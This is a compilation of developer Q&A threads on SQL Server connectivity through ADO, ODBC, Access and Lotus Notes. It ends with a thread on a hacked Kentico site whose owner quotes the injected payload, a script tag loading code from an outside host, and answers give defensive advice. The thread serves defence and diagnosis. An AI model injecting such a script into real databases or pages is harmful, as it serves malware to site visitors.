Working on an Excel VBA project that sends data to an SQL server via ADO. In my office I have no issues but the users are based at locations where they use VSAT connections. Thus, the ping time go for 1-2 ms to 800 ms for lag.
I want to test my code's ADO Connection and Command Timeouts to make sure I have them set appropriately. Anyone have any tried and true code snippets that increase the CommandTimeout and ConnectionTimeout after a failed .open or .execute command?
I have seen via Google Search that many web developers use Fiddler but that looks like it will only work for HTTP-type connections.
Anyone have an idea that doesn't involve me creating my own VPN (I have no server) or re-configuring the SQL server, I'm not the owner.
Related
Currently, I have two separate SQL Server instances that I am querying using pass-through SQL queries via a form in Microsoft Access.
The queries to SERVER1 work every time without fail. I'd say about 80% of the time the queries to SERVER2 don't work after Access has been closed and re-opened until I go in and "modify" the OBDC connection string and save the query. I have quotes around modify because if I edit one character in the string and re-add it and then save, it usually starts to work again (but not always), even though the string hasn't changed. And once it works it will continue to work until once again Access is closed.
It's usually one of three errors, here are two of them and the third error which I get less frequently is that the login is incorrect:
The OBDC connection string is as follows (for what it's worth I also tried ODBC Driver 17 for SQL Server and got the same results):
ODBC;Description=SERVER2 PASSTHROUGH;DRIVER=ODBC Driver 11 for SQL Server;SERVER=SERVER2;UID=Test;PWD=Password;DATABASE=MyDB;LANGUAGE=us_english;ApplicationIntent=READONLY;
How do I go about solving this problem? Also, I am willing to provide any clarifying information.
Thanks!
Thanks to Alex for the reply.
Alex recommended going to SQLCMD Unable to complete login process due to delay in opening server connection. I should have been more scientific but I used a shotgun approach... I set my shared memory to disabled, as well as increased the connection timeout and command timeouts.
This then produced a new error for me similar to the one here No process is on the other end of the pipe (SQL Server 2012).
As many of the comments suggested, my SQL server was set to SQL Server and Windows Authentication mode, I changed it to Windows Authentication mode, and then back to SQL Server and Windows Authentication mode, and restarted my SQL server.
And for now, my problem has not shown up through multiple MS Access restarts and a few PC restarts as well for good measure. Fingers crossed.
My application (a testcase automation tool) does not support calling ODBC's SQLSetStatmentOption. I need to set the cursor option SQL_SOPT_SS_CURSOR_OPTIONS to SQL_CO_FFO_AF. Right now I connect to the server using a connection string (no DSN). I am using sqlsrv32.dll or Sqlncl10.dll.
Is there a way to set the cursor option in a DSN (or other layer) between my tool and the MSSQL server? The tool handles creating the cursor (or results set) and iterating through the result set in a way that seems to obscure any ability to manage it directly. It does allow for calling SQLSetConnectAttr() but as far as I can tell there's no way to set a cursor option in there.
All of this is an attempt to speed up retrieving data over a remote connection. In SQL Management Studio I get comparable response times to the local or remote DB, but in the automation tool the remote queries take hundreds of times longer, probably because it seems to be making a round trip to the sever for every row.
There is no way to set statement options in the connection string that I know of. In ODBC 1.0 and 2.0 you could make calls to SQLSetConnectOption for statement attributes and they set those attributes in each statement created in that connection but a) that is an old version of the API (although it probably still works) b) you still cannot do it from the DSN. In unixODBC you can set some environment and connection attributes in the DSN but your obviously Windows.
I'm not convinced anyway that you've identified the problem correctly and even if you have, how do you know your app does not use SQLGetData (which is disabled when you set SQL_CO_FFO_AF). Are you sure you've not enabled MARs. Did you try getting an ODBC trace to see what the app is doing?
I need to connect and send/receive information from an MS SQL server in my Lotus Notes app using #formula in realtime (I can connect using an agent, but I need to use inline code for this).
The commands themselves seem pretty straight forward, but setting up the configurations seems to be a topic with scarce documentation. Apparently I need to install an ODBC driver. Where would I find that, and do I install that onto the server or onto the workstations that will run this app?
If any Lotus gurus could step me through setting this up, it would be greatly appreciated.
Thanks
You'll need to install the ODBC driver on the workstations that run this app, if the users will be triggering the ODBC connections. If at all possible, I highly suggest setting this up on the server side, and having it run via an agent. That'll save you from a few headaches, including having to maintain the ODBC connections on each workstation and worrying if each workstation has access to the data and server.
You first just want to make sure your ODBC setup is correct. You'll need the appropriate driver, of course, and the connection information. This site has a walkthrough to give you an idea of how to setup an ODBC database connection
If you have MS Access you can use it to test querying from the ODBC data source. Once you've tested the connection works, you'll just refer to the data source name (DSN) in your #DbColumn, #DbLookup, or #DbCommand formulas.
Back to my suggestion on setting this up on the server side, that would mean you'd keep a copy of the data you're querying within the Notes database itself, and then users would be interacting with read-only data in Notes. You could schedule updates regularly on the server side of that read-only data and effectively create a cache of the data in your Notes environment. Then that data would replicate around to other replicas of the database, but remove the trouble of the ODBC connection being needed everywhere.
If you need realtime data, though, that solution is out the window and you'll have to go with a local solution. In that case, you might want to look at the LCConnection class or using an ADODB.Connection from script, as both will allow you to create DSN-less connections to data sources. You'd then save the trouble of requiring ODBC data sources on each workstation, and only have to worry about whether they can access the server from their workstation.
I would add another option to Ken's list. It involves having the server do the queries of the external database (therefore you are only setting up ODBC in on the server - you don't have to deal with it on the workstations). You create an agent that is launched on the server using the 'run on server' technique. When the workstation needs to query the external data, the code creates a throw-away document in the database, puts the query criteria into the temporary document, saves the document, then calls the 'run on server' agent passing a reference to the temporary document. The server launches the agent, reads the criteria from the temporary document, does the query, and writes the results back to the temporary document. Then the workstation can access the query results from the temporary document. A scheduled agent can delete the temp docs on a regular basis.
It sounds complicated, and it all has to be done in script, but I've done this in many applications and it is fast, flexible, easy to administer, and gives your applications a lot of power. Note that end users must have the ACL rights to create a document in the db (the temp doc) in order for this to work.
Good luck!
I'll try and keep this simple, I have worked on projects in the past whereby we use either Oracle or MS SQL server as the data store with Access as the front-end, rather than linking in the tables I tend to use an ADO connection to the respective database in order to open my recordsets as in most cases this is faster as the query is executed against the server and then the results returned rather than the work been on the local PC.
My question now I've finally got there is, if I place an access .mdb file on a server machine with more processing power than my local PC and then run queries from it using an ADO connection (like Oracle/MS SQL), will it provide better performance due to the .mdb been on the server; or as it's access will the work automatically still be done by the local PC as access is a file type database rather than a database server?
No it will be slower - the queries will still run client side, and you will have network activity on top.
Access applications always run on the client side. Locking takes place by using Windows filesystem byte range locks on the LDB file, to allow multiple instances of Access to modify the same MDB file.
All the code runs on the client, and you will be having to send the data across the network. The only work the server will be doing with an MDB file is acting as a file server.
Just use SQL Server Express if Access is not fast enough. Since SQL Server is a client-server system, putting it on a fast server will help.
My site is created in Kentico CMS 5.5 and SQL server 2008. Its running successfully but now these days any one of hacker hack my site and after a long time i found that in many of tables hacker add
></title><script src="http://lilupophilupop.com/sl.php"></script><!--
line in before of ever varchar cell. Suppose i have user table in that case before username it adds this string, before user's email-ID it adds this same string. How i can prevent my sql server by using this hacking. And what is the reason behind this?
How i can prevent my sql server by using this hacking.
First, you need to find out how the hacker got the data into your database (SQL injection, weak account password, ...). Then you can take appropriate actions.
And what is the reason behind this?
The hacker hopes that the varchar field is printed on a web page without being properly encoded first. If that happens, the user's browser will download and execute the script.
This looks like it could be an 'SQL Injection' attack probably aimed at sending your visitors to a malware of fraudlent site.
Unfortunatly as Kentico CMS is commercial software your options are limited. You won't have the source that you can tweak to prevent further attacks commint through the front end.
You may need to
Review the security of your SQL server and ensure that the attacker didn't connect to it directly
Update to the latest security patch for the CMS (if you pay for maintenance it's free)
Get support from Kentico, they may have seen this before
Clean up your data and remove the offending scripts
If none of that is sucessful you may be able to add triggers to the necessary tables in SQL to remove the scripts as they are inserted in the database.
You need to follow the industry best practices : look at
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
For the top 10 Web application security risks.
There are few things to keep in mind that save your database from hacking is given below:
Always use parametrized Sql, pass all values to DB using parametrized query
SqlCommand cmd = new SqlCommand("SELECT * FROM TableName WHERE ID = #ID");
Not
SqlCommand cmd = new SqlCommand("SELECT * FROM TableName WHERE ID = " + value + "");
Similarly, use INSERT, UPDATE, and DELETE query, or use STORED PROCEDURE in same manner.
Only set permission to your specific user
You can on/off ValidateRequest in your page/web.config file as required.
Set Validation both in client/server side so that only valid data will pass to DB
User appropriate data type in your column other than using a common data type (say VARCHAR)
Thanks
I agree with #Heinzi - you should make an effort to figure out the attack vector (how the baddie got into your application). You've found text in your database, but how did it get there? Directly via Sql Server or through the web server OR through Kentico? As you go through this investigative process, make notes of where your security is weak, and firm it up as you go - you're essentially doing a security audit! Doing these steps will lead you to harden your servers against most sort of attacks, hopefully preventing this sort of thing from happening to you again.
I don't know anything about your topology (how your servers are set up and connected to each other and the web), but we can make a start at investigating by looking into the windows log of the machine your sql server is installed on - look for logins happening at times that are questionable, look for odd user accounts, and examine your password and username security. Get more details of things to look into here:Windows Intruder Detection Checklist
If that doesn't turn up anything, look at the Sql server logs, and review your username/password security AND the access to the sql server instance; eg: the sql server should only be accessible from machines that have an explicit reason - your web server, maybe a network admin box, etc - use Windows Firewall to make the access 'tight', so that the sql server instance doesn't just respond to any computer asking. - Here's more details about how to secure sql server.
Check the web.config on your webserver - is the sql server username and password there? Check your ftp logs to see if anyone's tried to read it recently.
Kentico versions 5+ (and maybe earlier) come with the ability to log 'events'. If you have event logging turned on, you should be able to see your templates being modified; go to Site Manager > Administration > Event Log and go back to the date when you first noticed it, and examine the entries for what user account was doing the modifications.
Or even better: if you have access to the db server, you can do a direct table query to get at this data:
SELECT TOP 1000 *
FROM [CMS_EventLog] Look again for entries that seem to happen at odd times from weird Ip addresses or usernames.
And again, it's better to restrict access to all 'sensitive' resources (the Database, Kentico cmsdesk and siteadmin) as best you can. Windows Firewall is pretty great at doing this - tighten down Remote Desktop access, and close as many ports as you can to reduce your servers' exposed surface area. Test your exposure using something as simple as Shields Up! from Gibson Research or the Awesome Nmap security scanner tool.
As an example, my web servers only publicly expose ports 80 and 443 (http and https), and maybe a random high port like 4456 for Ftp if it's needed. I use Windows Firewall to restrict access to Remote Desktop to a handful of IP addresses. The Sql servers have NO public ports, they are tuned to 'stealth' and not reply to any request from a non-authorized IP.
As an anecdotal example - when I put a server live, it has taken as little as 8 hours before bots start trying to log in via remote desktop (you can see thousands of failed attempts in the windows Event Log > security) - as soon as you use windows firewall to ignore non-approved IP addresses, the log stays clear.
As a helpful note: if you are not experienced doing this sort of thing, you may want to procure the services of an experienced Windows system administrator to help you. And please realize that there may be more compromised systems - you may have just found the 'tip of the iceberg', there could be Trojans and Rootkits and other nasties waiting, so you'll need a full security scan too.